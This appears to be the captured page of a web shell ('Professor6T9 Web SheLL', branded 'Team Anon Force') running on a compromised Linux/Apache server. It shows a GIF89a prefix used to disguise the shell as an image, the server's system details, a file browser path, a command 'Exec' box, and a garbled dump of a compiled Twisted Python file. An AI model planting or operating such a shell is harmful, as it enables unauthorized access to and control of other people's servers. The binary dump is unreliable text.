GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux sonniq.ru 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
127.0.0.1
/
lib
/
python3
/
dist-packages
/
twisted
/
python
/
__pycache__
[ HOME ]
Exec
Submit
File Name : fakepwd.cpython-310.pyc
o �bL � @ sT d Z ddlmZ ddgZG dd� d�ZG dd� d�ZG dd � d �ZG d d� d�ZdS )zM L{twisted.python.fakepwd} provides a fake implementation of the L{pwd} API. � )�List�UserDatabase�ShadowDatabasec @ sP e Zd ZdZdededededededed d fdd�Zd efd d�Zdd� Zd S )�_UserRecordz� L{_UserRecord} holds the user data for a single user in L{UserDatabase}. It corresponds to the C{passwd} structure from the L{pwd} module. See that module for attribute documentation. �name�password�uid�gid�gecos�home�shell�returnNc C s. || _ || _|| _|| _|| _|| _|| _d S �N��pw_name� pw_passwd�pw_uid�pw_gid�pw_gecos�pw_dir�pw_shell)�selfr r r r r r r � r �8/usr/lib/python3/dist-packages/twisted/python/fakepwd.py�__init__ s z_UserRecord.__init__c C � dS )N� r �r r r r �__len__'